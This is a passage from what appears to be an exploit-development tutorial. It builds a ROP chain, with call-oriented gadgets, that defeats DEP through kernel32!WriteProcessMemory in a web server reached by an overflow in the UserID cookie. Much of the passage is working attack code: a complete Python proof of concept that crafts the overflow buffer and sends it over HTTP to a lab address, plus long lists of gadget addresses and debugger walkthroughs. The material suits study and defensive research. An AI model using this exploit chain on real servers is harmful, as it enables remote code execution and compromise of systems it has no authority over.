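    """Model of the arbitrary read followed by adding the fixed distance."""
    leaked = memory[POINTER_SLOT]            # mov ecx, dword ptr [ecx]
    return (leaked + DELTA) & 0xFFFFFFFF

# Two made-up ASLR bases, standing in for two different boots.
for kernel32_base in (0x75A00000, 0x76F30000):
    memory = {POINTER_SLOT: kernel32_base + RVA_WRITE_FILE_IMPL}
    resolved = resolve_wpm(memory)
    assert resolved == kernel32_base + RVA_WRITE_PROCESS_MEMORY
    print("0x%08x" % resolved)
```

Even though the leaked pointer differs on every boot, the same DELTA lands on the right function each time.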

crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)

The next “parameter” is not really even a parameter at all. Similarly to my last ROP post, this will be used as the address in which program execution will transfer to AFTER the call to kernel32!WriteProcessMemory is made. This will also be the same address as our shellcode.

Why 0x61c72530 specifically?

sqlite3.dll is a module of the application - meaning it is a part of process memory. Since this DLL is required for the application to work, we can target it as a place to write our shellcode. With this method of ROP, we need to find an executable portion of memory within the application and its modules. Then, using the call to kernel32!WriteProcessMemory - we will write our shellcode to this executable portion of memory. Using the command !dh sqlite3 in WinDbg, we can determine the .text section of the portable executable has execute permissions. Also recall that even without write permissions, we can still write our shellcode if we “proxy” the write through the API call.

Viewing the .text section address - we can see that the address chosen is just an executable “code cave” that is not initialized to any memory - meaning that if we corrupt this memory, the program shouldn’t care.

This means, after the function call is completed and our shellcode is written here - program execution will transfer to this address.

crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)

The handle parameter is quite easy to fill - we can even use a static value. According to Microsoft Docs, GetCurrentProcess() returns a handle to the current process. More specifically, it returns a “pseudo handle” to the current process. A pseudo handle, denoted by -1 or 0xFFFFFFFF, is a “special” constant that refers to a handle to the current process. This means, whenever a Windows API function requests a handle (generally in user mode), passing 0xFFFFFFFF will tell the API in question to utilize a handle to the current process. Since we would like to write our shellcode to memory within the process space - passing 0xFFFFFFFF to the kernel32!WriteProcessMemory function call will tell the function we would like to write to virtual memory within the current process space.
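If the “-1 or 0xFFFFFFFF” wording seems odd, the following quick check shows that both are the same four bytes on a 32-bit system. The constant name PSEUDO_HANDLE is just a label for this sketch.

```python
import struct

PSEUDO_HANDLE = 0xFFFFFFFF

# -1 as a signed DWORD and 0xFFFFFFFF as an unsigned DWORD have the same encoding.
same_bytes = struct.pack('<l', -1) == struct.pack('<L', PSEUDO_HANDLE)
as_signed = struct.unpack('<l', struct.pack('<L', PSEUDO_HANDLE))[0]

print(same_bytes)   # True
print(as_signed)    # -1
```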

crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 

lpBaseAddress will be the address of our shellcode, as already outlined by the “return” parameter.

crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)

lpBuffer will be a pointer to our shellcode (which will first need to be written to the stack). We will dynamically resolve this with ROP gadgets.

crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 

nSize will be the size of our shellcode.

crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

Lastly, lpNumberOfBytesWritten will be any writable address.

Let’s ROP v2!

We will be using what some have dubbed the “pointer” method of ROP (when it comes to x86 at least), where we will place these parameter “placeholders” on the stack and then dynamically change what these parameters point to in order to make a successful function call. Here is the PoC we will be using.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack)  - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x61c832e4)    # Pointer to kernel32!WriteFileImplementation (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProcess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host: 172.16.55.140\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

The above PoC places the parameters on the stack and also performs a “jump” over them with add esp, 0x1C. Let’s examine this in the debugger.
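Why 0x1C specifically? A quick sketch, packing the same seven placeholder DWORDs used in the PoC, shows that together they occupy exactly 0x1C bytes - which is the distance the add esp, 0x1c gadget needs to hop over.

```python
import struct

# The seven placeholder DWORDs from the PoC: function pointer, return address,
# and the five kernel32!WriteProcessMemory parameters.
placeholders = b""
for value in (0x61c832e4, 0x61c72530, 0xFFFFFFFF, 0x61c72530,
              0x11111111, 0x22222222, 0x1004D740):
    placeholders += struct.pack('<L', value)

print(hex(len(placeholders)))   # 0x1c
```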

The following is the state of the stack - with the kernel32!WriteProcessMemory parameters outlined in red.

The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we can see the stack moves further down.

We can see that we have moved further into our buffer, where our future ROP gadgets will reside. The parameters for the function call are now “behind” where program execution is - meaning we will not inadvertently corrupt these parameters because they are not within the current execution flow.

Now that this is out of the way - we can “officially” begin our ROP chain to obtain code execution.

lpBuffer

The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else. Since we have control of the stack, we will just preemptively place our shellcode there. This is where the headache of storing an address near the stack in EAX and ECX will come into play.

As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.

The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.

Let’s say we get the parameter placeholder’s location (i.e. the virtual memory address, not the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be reading the value 0x2826930. However, if we read the value of dword ptr [ecx] instead - we would be reading the actual value of 0x11111111.

The first part of the image above shows the value of the address itself. The second part of the image shows what happens when we “dereference” (using poi in WinDbg), or extract the value a memory address is pointing to. We can leverage this, by using an arbitrary write primitive. When we get the address of the lpBuffer parameter into ECX - we then will not overwrite ECX, but rather dword ptr [ecx] - which will force the address on the stack (which contains the parameter placeholder) to point to something other than 0x11111111.

Remember - every time the process is terminated and restarted - the virtual memory on the stack changes. This is why we need to dynamically resolve this parameter, instead of hardcoding an address.
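The difference between ECX and dword ptr [ecx] can be modeled with a dictionary standing in for memory. This is just a sketch: the placeholder address is the one mentioned above (it will differ on every run), and the shellcode address is a made-up value.

```python
PLACEHOLDER_ADDR = 0x02826930             # stack address of the lpBuffer placeholder (changes per run)
memory = {PLACEHOLDER_ADDR: 0x11111111}   # toy model of process memory

ecx = PLACEHOLDER_ADDR
print("0x%08x" % ecx)                     # 0x02826930 (the address itself)
print("0x%08x" % memory[ecx])             # 0x11111111 (dword ptr [ecx], the value stored there)

# Arbitrary write: ECX itself is untouched, only what it points to changes.
shellcode_addr = 0x02826C00               # hypothetical stack address of the shellcode
memory[ecx] = shellcode_addr              # mov dword ptr [ecx], reg
print("0x%08x" % memory[PLACEHOLDER_ADDR])   # 0x02826c00
```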

We will use the following ROP gadgets, in order to make ECX contain the stack address holding the lpBuffer parameter placeholder.

crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

Two things about the above ROP gadgets. First, the clc instruction.

clc is an assembly instruction that clears the “carry” flag (the CF bit in the EFLAGS register). None of our ROP gadgets, now or later, depend on the state of this flag - so it is okay that this instruction resides in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are not using the EDX register for anything - so this instruction will not disrupt what we are trying to achieve.

Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10 hexadecimal) - even though the parameter placeholder for lpBuffer is located 0x18 bytes away (24 decimal bytes).

This is again a “preparatory” procedure for our future ROP gadgets. We need a gadget, similar to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the stack address of our shellcode and dword ptr [ecx] contains the stack address which is currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our shellcode.

However, no such gadgets were easily found in the process memory. The closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX by 0x10 instead of 0x18 - due to the gadget writing to the address in ECX at an offset of 0x8 (0x18 - 0x10 = 0x8).
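Here is a short sketch of why 16 inc ecx gadgets are enough. The starting ECX value is hypothetical, chosen only so that it sits 0x18 bytes before a placeholder at 0x02826930.

```python
PLACEHOLDER_ADDR = 0x02826930   # address of the lpBuffer placeholder (changes per run)
PLACEHOLDER_OFFSET = 0x18       # distance from ECX to the placeholder
WRITE_DISPLACEMENT = 0x8        # from mov dword ptr [ecx+0x8], eax

inc_count = PLACEHOLDER_OFFSET - WRITE_DISPLACEMENT   # number of inc ecx gadgets needed

ecx = PLACEHOLDER_ADDR - PLACEHOLDER_OFFSET           # hypothetical starting ECX
for _ in range(inc_count):
    ecx += 1                                          # inc ecx

print(inc_count)                                      # 16
print("0x%08x" % (ecx + WRITE_DISPLACEMENT))          # 0x02826930
```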

The key is now to give some padding between the space on the stack for our future ROP gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on the stack for remaining ROP gadgets. This will allow us to “simulate” the rest of our ROP gadgets and choose a place on the stack that our shellcode will go, and start performing these calculations now. Think of these 0x300 bytes as “ROP gadget placeholders”. If perhaps we would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we would move our shellcode down lower. We will “aim” for 0x300 bytes down the stack, and we will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following ROP gadgets can accomplish loading the location of our “shellcode” (future shellcode) into EAX.

crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about 0x2bc bytes away from EAX (0xfffffd44 is the negative representation of 0x2bc)
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

The location where our shellcode will be (your location can be different, depending on how far down the stack you wish to place it) is 0x2bc bytes away from the value in EAX. To load our shellcode value into EAX, we need to increase it by 0x2bc bytes. Obviously, this is too much for just consecutive inc eax gadgets. Additionally, if we directly add to EAX - the NULL byte problem would kill our exploit. This is because a 32-bit register, like EAX, needs the value 0x000002bc to completely fill its contents. To address this, we can use negative numbers and subtraction to yield the same result!

The negative representation of 0x2bc will be loaded into ESI. We will then need to also compensate for the add esp, 0x8 instruction. To do this, we will add 0x8 bytes of padding so no gadgets get “jumped over”. Then, we will subtract the value in ESI from EAX - and place the difference in EAX. This will result in the address of where our shellcode will go being placed into EAX. Additionally, we need to compensate for the two pop instructions in the second gadget.
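To see how the padding lines up, the routine can be traced with a list standing in for the stack. This is a simplified sketch: the starting EAX value is hypothetical, and 0xCCCCCCCC is only a stand-in for whatever gadget comes next.

```python
PAD = 0x90909090
MARKER = 0xCCCCCCCC       # stand-in for the next gadget in the chain

chain = [
    0x1001fce9,           # pop esi ; add esp, 0x8 ; ret
    0xfffffd44,           # value popped into ESI
    PAD, PAD,             # skipped by add esp, 0x8
    0x10022f45,           # sub eax, esi ; pop edi ; pop esi ; ret
    PAD, PAD,             # consumed by pop edi and pop esi
    MARKER,
]

start_eax = 0x02826928    # hypothetical stack address held in EAX
eax = start_eax
sp = 0                    # index into chain, standing in for ESP

eip = chain[sp]; sp += 1             # ret into the first gadget
esi = chain[sp]; sp += 1             # pop esi
sp += 2                              # add esp, 0x8
eip = chain[sp]; sp += 1             # ret (lands on the second gadget)
second_gadget = eip
eax = (eax - esi) & 0xFFFFFFFF       # sub eax, esi
edi = chain[sp]; sp += 1             # pop edi
esi = chain[sp]; sp += 1             # pop esi
eip = chain[sp]; sp += 1             # ret

print("0x%x" % (eax - start_eax))    # 0x2bc
print("0x%08x" % eip)                # 0xcccccccc
```

Without the four padding DWORDs, the add esp, 0x8 and the two pop instructions would swallow real gadgets instead.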

Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating gadget(s).

Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter - as expected.

Program execution then redirects to the EAX manipulation routine.

The intended negative value of 0x2bc is placed into ESI.

The value is then subtracted and the difference is placed in EAX! We have successfully loaded the address of where our shellcode will go, further down the stack, into EAX.

Note, the address where our shellcode will go is denoted with NOPs in the above image for visual effect. This was done in the debugger to outline the process taken here.

The last step is to utilize the following ROP gadget to change the lpBuffer parameter placeholder to point to the legitimate parameter (which is the shellcode location down the stack).

crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the gadget in question.

As we can already see from the image above, 0x11111111 (which is the parameter placeholder for lpBuffer), is going to be what is overwritten with the contents of EAX (which contains the stack address which points to our shellcode).

State of the lpBuffer parameter placeholder before the instruction is stepped through.

After stepping through the instruction - we can see the lpBuffer parameter placeholder has been dynamically changed to the correct address!

nSize

nSize, as you can recall from earlier, refers to the size of our region of memory we would like written in the process space. We would like the size of our shellcode to be about 0x180 bytes (384 decimal) - as this is more than enough for any type of shellcode.

Since ECX and EAX are being used for stack addresses - let’s use another register for this parameter. Let’s use EDX.

Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of 0x20.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
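As a rough sketch (not part of the original PoC), the number of repetitions can be computed instead of counted by hand. The helper name repeat_gadget is made up for illustration, and the snippet assumes EDX starts at zero; the gadget address, the 0x20 step, and the 0x180 target are the values used above. It is written for Python 3, so the chain is a bytes object.

```python
import struct

ADD_EDX_0X20 = 0x1001b884   # add edx, 0x20 ; push edx ; call edi (address from the chain above)
STEP = 0x20                 # amount each execution of the gadget adds to EDX
TARGET_NSIZE = 0x180        # desired nSize value (384 decimal)

def repeat_gadget(address, count):
    """Hypothetical helper: pack the same gadget address `count` times."""
    return struct.pack('<L', address) * count

# Assuming EDX starts at zero, the repetition count is simply target / step.
count, remainder = divmod(TARGET_NSIZE, STEP)
assert remainder == 0, "target must be a multiple of the gadget's step"

nsize_chain = repeat_gadget(ADD_EDX_0X20, count)
print(count, len(nsize_chain))
```

Twelve repetitions, one packed DWORD each, matches the twelve lines listed above.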

Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is placed in it, the gadget doesn’t end with a ret - meaning it will not return back to the stack and pick up the next gadget.

Instead, this gadget performs a call edi instruction. This, at first glance - will completely kill our ROP chain, as execution will not redirect back to the stack. However, there is a way around this - with a technique called Call-oriented Programming (COP).

Essentially, since we know that EDI will be called, we can first pop the address of a ROP gadget into EDI that performs an add esp, X ; ret. Why add esp, X, you may ask?

As you may, or may not, know - when a call instruction is executed, it pushes its return address onto the stack. This is done so execution knows where to resume once the called routine finishes. We can simply execute an add esp, X gadget to jump over this return address and back into our ROP chain. There is one more thing we need to take into account from our gadget, though, and that is push edx.

This will push the EDX register onto the stack before the call instruction pushes its return address - meaning a total of 0x8 bytes (2 DWORDs) will be pushed onto the stack. To compensate for this, we will load an add esp, 0x8 ; ret gadget into EDI.
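To make the stack accounting concrete, here is a minimal model of ESP around one execution of the COP gadget. The starting ESP value is an arbitrary illustration value; only the deltas matter.

```python
DWORD = 4

esp = 0x1000                 # hypothetical ESP: points at the next gadget slot in the chain
next_gadget_slot = esp

esp -= DWORD                 # push edx: EDX is written just below the next gadget slot
esp -= DWORD                 # call edi: the return address is pushed as well
pushed = next_gadget_slot - esp

esp += 0x8                   # add esp, 0x8: step back over both pushed DWORDs
assert esp == next_gadget_slot   # the following ret pops the next gadget in the chain
print(hex(pushed))
```

If the gadget in EDI adjusted ESP by anything other than 0x8, the ret would land on the pushed return address or on the pushed EDX value instead of the next gadget.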

Here is how our routine of gadgets will look, in totality.

crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Let’s view this all in the debugger.

First, program execution hits our pop edi instruction, which will load the “return to the stack” ROP gadget into EDI.

pop edi places the address of the add esp, 0x8 ; ret gadget into EDI.

The next gadget is hit, which will set EDX to zero so we can start with a “clean slate”.

Now, program execution is ready for the add edx, 0x20 gadget - which will be repeated until EDX has been filled with 0x180.

push edx is then executed, resulting in EDX being placed onto the stack.

call edi is now about to be executed. Stepping through the instruction, with t in WinDbg, pushes the caller’s return address onto the stack.

Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the stack - where the exact same routine will be repeated until 0x180 is placed into EDX.

After repeating the routine, EDX now contains 0x180.

Now that EDX contains our intended value of 0x180, we can use the same kind of mov dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with our intended value of 0x180.

ECX still contains the stack address 0x8 bytes behind the now correct lpBuffer parameter (remember, ECX was used at an offset of 0x8 last time). The lpBuffer parameter is in turn 0x4 bytes behind the nSize parameter placeholder - for a total of 0xC bytes, or 12 decimal bytes.

As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted by 0x22222222).
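The distance can be double-checked with a small table of the fake call frame. This is only a sketch: the names are labels for the placeholders in the order they sit on the stack, and the offsets are relative to the first placeholder rather than real addresses.

```python
# Placeholders in stack order; each one is a single DWORD.
FRAME = [
    "WriteProcessMemory",        # function pointer placeholder
    "return_address",
    "hProcess",
    "lpBaseAddress",
    "lpBuffer",
    "nSize",
    "lpNumberOfBytesWritten",
]
OFFSET = {name: index * 4 for index, name in enumerate(FRAME)}

# The lpBuffer write used mov dword [ecx+0x8], eax, so ECX sits 0x8 bytes behind lpBuffer.
ecx = OFFSET["lpBuffer"] - 0x8
inc_ecx_needed = OFFSET["nSize"] - ecx
print(hex(inc_ecx_needed))
```

The same table gives the 0x14 bytes between nSize and the kernel32!WriteProcessMemory placeholder, which is the distance ECX is decremented by later on.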

Utilizing inc ecx gadgets, as in a previous ROP routine, we can increase ECX by 0xC (12 decimal) bytes to load the address of the nSize parameter placeholder.

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

